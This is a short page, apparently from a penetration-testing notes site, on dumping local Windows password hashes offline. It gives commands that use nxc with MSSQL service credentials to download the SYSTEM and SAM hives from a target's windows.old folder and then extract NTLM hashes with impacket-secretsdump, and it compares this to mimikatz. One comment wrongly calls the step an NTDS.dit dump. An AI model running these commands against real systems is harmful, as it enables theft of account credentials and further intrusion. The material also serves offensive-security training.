Local SAM Dump
If we have access to a windows.old directory or an old Windows backup, we can extract the SYSTEM and SAM registry hives to perform offline credential dumping:
The
SAMhive contains encrypted NTLM password hashes for local user accountsThe
SYSTEMhive holds the boot key required to decrypt them.
# Download files with nxc
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SYSTEM" ./SYSTEM
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SAM" ./SAM
# Dump NTDS.dit
impacket-secretsdump -system SYSTEM -sam SAM LOCALThis technique is conceptually the same as using
mimikatz lsadump::sam, which performs the same operation but directly on a live system.
Last updated
Was this helpful?